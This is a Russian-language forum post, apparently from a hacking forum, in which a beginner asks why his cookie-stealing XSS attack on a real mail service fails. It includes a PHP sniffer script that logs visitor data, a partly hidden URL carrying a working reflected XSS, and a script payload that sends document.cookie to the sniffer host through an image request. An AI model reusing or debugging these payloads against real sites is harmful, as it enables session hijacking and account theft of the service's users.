Здраствуйте уважаемый античат и участники форума.
У меня наболевщая пролемма.
начитавшись всевозможной информации по xss атакам я решил реализовать то что усвоил но пришол в тупик. проблемма наверняка для вас пустяковая, но мне не разобраться одному, поэтому прошу у вас помощи.
По схеме сделал сниффер:
PHP код:
<?php $fp=fopen("log.html","a+t"); fputs($fp," Время: ".date("")."<br> IP: ".$_SERVER."<br> Откуда: ".htmlentities($_SERVER)."<br> Браузер: ".$_SERVER."<br> QUERY_STRING: ".$_SERVER."<br><br> "); fclose($fp); ?>
закачал его на хостинг
нашол на форуме в разделе "Пассивные xss на почтовый серверах" нашол эту самую xss:
Код:
http://3k.mai............nt=1&code="><script>alert('xss')</script>
(ссылку даю не полную так как возможно изза этого удаляют мои темы)
этот скрипт работает.
а если вписываешь в него строку со ссылкой инфы на снифер то ноль, вот такой код добавляю:
Код:
<script>img=new Image();img.src="адресс снифера?"+document.cookie();</script>
подскажите в чем проблема тут, фильтрация тегов?
или чтото другое? помогите пожалуста мне больше неккому обратиться.